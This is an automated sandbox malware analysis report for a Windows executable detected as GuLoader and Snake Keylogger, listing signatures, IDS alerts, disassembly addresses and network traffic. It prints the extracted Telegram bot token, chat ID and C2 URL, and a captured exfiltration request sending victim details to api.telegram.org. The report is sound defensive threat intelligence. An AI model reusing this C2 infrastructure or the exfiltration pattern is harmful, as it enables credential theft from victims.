Edit tour

Windows Analysis Report
4kobC6KGC3.exe

Overview

General Information

Sample name:	4kobC6KGC3.exe
Analysis ID:	1634887
MD5:	108c208d6d523355b763e7a0284fa038
SHA1:	79e0d305adf1a2f5a12c7539f3ad8164432a6840
SHA256:	ae98bff3c519d8eff8b72857ff132b9c5b545ceaad056c8b5a08b8d107f2de5c
Infos:

Detection

GuLoader, Snake Keylogger

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected GuLoader

Yara detected Snake Keylogger

Yara detected Telegram RAT

Joe Sandbox ML detected suspicious sample

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64native

4kobC6KGC3.exe (PID: 8048 cmdline: "C:\Users\user\Desktop\4kobC6KGC3.exe" MD5: 108C208D6D523355B763E7A0284FA038)

4kobC6KGC3.exe (PID: 1300 cmdline: "C:\Users\user\Desktop\4kobC6KGC3.exe" MD5: 108C208D6D523355B763E7A0284FA038)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE", "Chat_id": "7695061973", "Version": "4.4"}

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE/sendMessage"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.54536508892.0000000038131000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000002.54536508892.0000000037FF1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.50858193838.0000000005BAE000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: 4kobC6KGC3.exe PID: 1300	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 4kobC6KGC3.exe PID: 1300	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-11T06:30:19.149960+0100	2803305	3	Unknown Traffic	192.168.11.20	49760	104.21.64.1	443	TCP
2025-03-11T06:30:19.771574+0100	2803305	3	Unknown Traffic	192.168.11.20	49761	104.21.64.1	443	TCP
2025-03-11T06:30:20.755512+0100	2803305	3	Unknown Traffic	192.168.11.20	49762	104.21.64.1	443	TCP
2025-03-11T06:30:21.386811+0100	2803305	3	Unknown Traffic	192.168.11.20	49763	104.21.64.1	443	TCP
2025-03-11T06:30:22.031021+0100	2803305	3	Unknown Traffic	192.168.11.20	49764	104.21.64.1	443	TCP
2025-03-11T06:30:23.656687+0100	2803305	3	Unknown Traffic	192.168.11.20	49765	104.21.64.1	443	TCP
2025-03-11T06:30:24.277419+0100	2803305	3	Unknown Traffic	192.168.11.20	49766	104.21.64.1	443	TCP
2025-03-11T06:30:24.900411+0100	2803305	3	Unknown Traffic	192.168.11.20	49767	104.21.64.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-11T06:30:17.521287+0100	2803274	2	Potentially Bad Traffic	192.168.11.20	49758	193.122.6.168	80	TCP
2025-03-11T06:30:18.771003+0100	2803274	2	Potentially Bad Traffic	192.168.11.20	49758	193.122.6.168	80	TCP
2025-03-11T06:30:19.380284+0100	2803274	2	Potentially Bad Traffic	192.168.11.20	49758	193.122.6.168	80	TCP
2025-03-11T06:30:20.005102+0100	2803274	2	Potentially Bad Traffic	192.168.11.20	49758	193.122.6.168	80	TCP
2025-03-11T06:30:20.989391+0100	2803274	2	Potentially Bad Traffic	192.168.11.20	49758	193.122.6.168	80	TCP
2025-03-11T06:30:21.614204+0100	2803274	2	Potentially Bad Traffic	192.168.11.20	49758	193.122.6.168	80	TCP
2025-03-11T06:30:23.270018+0100	2803274	2	Potentially Bad Traffic	192.168.11.20	49758	193.122.6.168	80	TCP
2025-03-11T06:30:23.894906+0100	2803274	2	Potentially Bad Traffic	192.168.11.20	49758	193.122.6.168	80	TCP
2025-03-11T06:30:24.526230+0100	2803274	2	Potentially Bad Traffic	192.168.11.20	49758	193.122.6.168	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-11T06:30:13.316559+0100	2803270	2	Potentially Bad Traffic	192.168.11.20	49756	142.251.32.110	443	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-11T06:30:32.161790+0100	1810008	1	Potentially Bad Traffic	192.168.11.20	49769	149.154.167.220	443	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-11T06:30:25.736189+0100	1810007	1	Potentially Bad Traffic	192.168.11.20	49768	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000002.00000002.54536508892.0000000037FF1000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE", "Chat_id": "7695061973", "Version": "4.4"}
Source: 4kobC6KGC3.exe.1300.2.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE/sendMessage"}

Multi AV Scanner detection for submitted file

Source: 4kobC6KGC3.exe	Virustotal: Detection: 77%			Perma Link
Source: 4kobC6KGC3.exe	ReversingLabs: Detection: 63%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AD7D3B0 CryptUnprotectData,		2_2_3AD7D3B0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AD7DB10 CryptUnprotectData,		2_2_3AD7DB10

Source: 4kobC6KGC3.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.64.1:443 -> 192.168.11.20:49759 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 142.251.32.110:443 -> 192.168.11.20:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.65.193:443 -> 192.168.11.20:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49768 version: TLS 1.2

Source: 4kobC6KGC3.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 0_2_004065C7 FindFirstFileW,FindClose,	0_2_004065C7
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 0_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405996
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 0_2_00402868 FindFirstFileW,	0_2_00402868
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_00402868 FindFirstFileW,	2_2_00402868
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_004065C7 FindFirstFileW,FindClose,	2_2_004065C7
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	2_2_00405996

Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 075FF45Dh	2_2_075FF2C0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 075FF45Dh	2_2_075FF4AC
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 075FFC17h	2_2_075FF95F
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AD72D41h	2_2_3AD72A90
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AD70D0Dh	2_2_3AD70B30
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AD716F8h	2_2_3AD70B30
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AD73308h	2_2_3AD72EF0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AD7FCA7h	2_2_3AD7FA00
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AD73308h	2_2_3AD73236
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	2_2_3AD70853
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	2_2_3AD70040
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AD73308h	2_2_3AD72EEA
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	2_2_3AD70673
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then mov esp, ebp	2_2_3AD7F769
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFBAA23h	2_2_3AFBA6E8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFBB00Fh	2_2_3AFBAD40
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFB0B97h	2_2_3AFB08F0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFB8597h	2_2_3AFB82F0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFBB9A6h	2_2_3AFBB6D8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFB556Fh	2_2_3AFB52C8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFBD996h	2_2_3AFBD6C8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFB3B5Fh	2_2_3AFB38B8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFBF986h	2_2_3AFBF6B8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFB214Fh	2_2_3AFB1EA8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFB073Fh	2_2_3AFB0498
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFB813Fh	2_2_3AFB7E98
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFBA537h	2_2_3AFBA290
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFBC756h	2_2_3AFBC488
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFBE746h	2_2_3AFBE478
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFB5117h	2_2_3AFB4E70
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFB3707h	2_2_3AFB3460
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFB1CF7h	2_2_3AFB1A50
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFBB516h	2_2_3AFBB248
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFB02E7h	2_2_3AFB0040
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFB7CE7h	2_2_3AFB7A40
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFBA0DFh	2_2_3AFB9E38
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFBD506h	2_2_3AFBD238
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFBF4F6h	2_2_3AFBF228
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFB4CBFh	2_2_3AFB4A18
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFB32AFh	2_2_3AFB3008
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFB189Fh	2_2_3AFB15F8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFB92A1h	2_2_3AFB8FF8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFBC2C6h	2_2_3AFBBFF8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFB788Fh	2_2_3AFB75E8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFBE2B6h	2_2_3AFBDFE8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFB9C87h	2_2_3AFB99E0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFB6277h	2_2_3AFB5FD0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFB4867h	2_2_3AFB45C0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFB2E57h	2_2_3AFB2BB0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFBD076h	2_2_3AFBCDA8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFB1447h	2_2_3AFB11A0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFB8E47h	2_2_3AFB8BA0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFBF066h	2_2_3AFBED98
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFB7437h	2_2_3AFB7190
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFB982Fh	2_2_3AFB9588
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFB5E1Fh	2_2_3AFB5B78
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFB440Fh	2_2_3AFB4168
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFBBE36h	2_2_3AFBBB68
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFB29FFh	2_2_3AFB2758
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFBDE26h	2_2_3AFBDB58
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFB0FEFh	2_2_3AFB0D48
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFB89EFh	2_2_3AFB8748
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFBFE16h	2_2_3AFBFB48
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFB59C7h	2_2_3AFB5720
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFBCBE6h	2_2_3AFBC918
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFB3FB7h	2_2_3AFB3D10
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFBEBD6h	2_2_3AFBE908
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFB25A7h	2_2_3AFB2300
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFE42B6h	2_2_3AFE3FE8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFE64E0h	2_2_3AFE61E8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFE22C6h	2_2_3AFE1FF8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFEBAF0h	2_2_3AFEB7F8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFE10BEh	2_2_3AFE0DF0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFE8FE8h	2_2_3AFE8CF0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFEFDE0h	2_2_3AFEFAE8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFED2D8h	2_2_3AFECFE0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFEA7D0h	2_2_3AFEA4D8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFE079Eh	2_2_3AFE04D0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFE7CC8h	2_2_3AFE79D0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFE3996h	2_2_3AFE36C8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFEEAC0h	2_2_3AFEE7C8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFEBFB8h	2_2_3AFEBCC0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFE5986h	2_2_3AFE56B8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFE94B0h	2_2_3AFE91B8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFE69A8h	2_2_3AFE66B0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFE3076h	2_2_3AFE2DA8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFED7A0h	2_2_3AFED4A8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFEAC98h	2_2_3AFEA9A0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFE5066h	2_2_3AFE4D98
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFE8190h	2_2_3AFE7E98
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFEEF88h	2_2_3AFEEC90
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFE2756h	2_2_3AFE2488
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFEC480h	2_2_3AFEC188
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFE154Eh	2_2_3AFE1280
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFE9978h	2_2_3AFE9680
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFE4747h	2_2_3AFE4478
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFE6E70h	2_2_3AFE6B78
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFEDC68h	2_2_3AFED970
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFE1E36h	2_2_3AFE1B68
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFEB160h	2_2_3AFEAE68
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFE0C2Eh	2_2_3AFE0960
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFE8658h	2_2_3AFE8360
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFE3E26h	2_2_3AFE3B58
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFEF450h	2_2_3AFEF158
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFEC948h	2_2_3AFEC650
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFE5EB7h	2_2_3AFE5B48
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFE9E40h	2_2_3AFE9B48
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFE030Eh	2_2_3AFE0040
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFE7338h	2_2_3AFE7040
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFE3506h	2_2_3AFE3238
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFEE130h	2_2_3AFEDE38
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFEB628h	2_2_3AFEB330
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFE54F6h	2_2_3AFE5228
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFE8B20h	2_2_3AFE8828
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFEF918h	2_2_3AFEF620
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFE2BE6h	2_2_3AFE2918
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFECE10h	2_2_3AFECB18
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFE19B7h	2_2_3AFE1710
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFEA308h	2_2_3AFEA010
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFE4BD6h	2_2_3AFE4908
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFE7800h	2_2_3AFE7508
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3AFEE5F8h	2_2_3AFEE300
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3B001B20h	2_2_3B001828
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3B000800h	2_2_3B000508
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3B001658h	2_2_3B001360
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3B000CC8h	2_2_3B0009D0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3B000339h	2_2_3B000040
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then jmp 3B001190h	2_2_3B000E98
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	2_2_3B043F70
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	2_2_3B043F60
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	2_2_3B040AC4
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	2_2_3B040AD0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.11.20:49769 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.11.20:49768 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /xml/191.96.227.220 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/191.96.227.220 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/191.96.227.220 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/191.96.227.220 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/191.96.227.220 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/191.96.227.220 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/191.96.227.220 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/191.96.227.220 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/191.96.227.220 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:980108%0D%0ADate%20and%20Time:%2011/03/2025%20/%2001:30:23%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20980108%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
